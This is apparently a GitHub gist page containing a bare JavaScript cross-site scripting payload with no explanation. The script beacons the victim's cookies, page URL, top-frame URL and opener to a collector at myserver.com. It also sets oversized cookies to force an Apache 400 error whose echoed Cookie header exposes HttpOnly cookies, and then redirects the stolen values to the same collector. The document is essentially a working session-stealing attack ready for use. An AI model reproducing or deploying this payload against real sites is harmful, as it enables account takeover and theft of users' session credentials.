-
-
Save Vic020/fa1968e683113d1fa54ae6105711d0a1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function(){(new Image()).src='http://myserver.com/xss//index.php?do=api&id=kQjOff&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); | |
if(''==1){keep=new Image();keep.src='http://myserver.com/xss//index.php?do=keepsession&id=kQjOff&url='+escape(document.location)+'&cookie='+escape(document.cookie)}; | |
function setCookies () { | |
/*apache server limit 8192*/ | |
var str = ""; | |
for (var i=0; i< 819; i++) { | |
str += "x"; | |
} | |
for (i = 0; i < 10; i++) { | |
var cookie = "ray"+i+"="+str+";path=/"; | |
document.cookie = cookie; | |
} | |
} | |
function parseCookies () { | |
if (xhr.readyState === 4 && xhr.status === 400) { | |
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); | |
content = content[1].replace("Cookie: ", ""); | |
cookies = content.replace(/ray\d=x+;?/g, '') | |
try { | |
var myopener=''; myopener = window.parent.openner.location; | |
var myparent = ''; myparent = window.parent.location; | |
} catch(err){ | |
myopener='0';myparent ='0'; | |
} | |
window.location='http://myserver.com/xss//index.php?do=api&id=kQjOff&location='+escape(document.location)+'&toplocation='+escape(myparent)+'&cookie='+escape(cookies)+'&opener='+escape(myopener); | |
} | |
} | |
setCookies(); | |
var xhr = window.XMLHttpRequest? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest(); | |
xhr.onreadystatechange = parseCookies; | |
xhr.open("POST", "/?"+Math.random(), true); | |
xhr.send(null); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment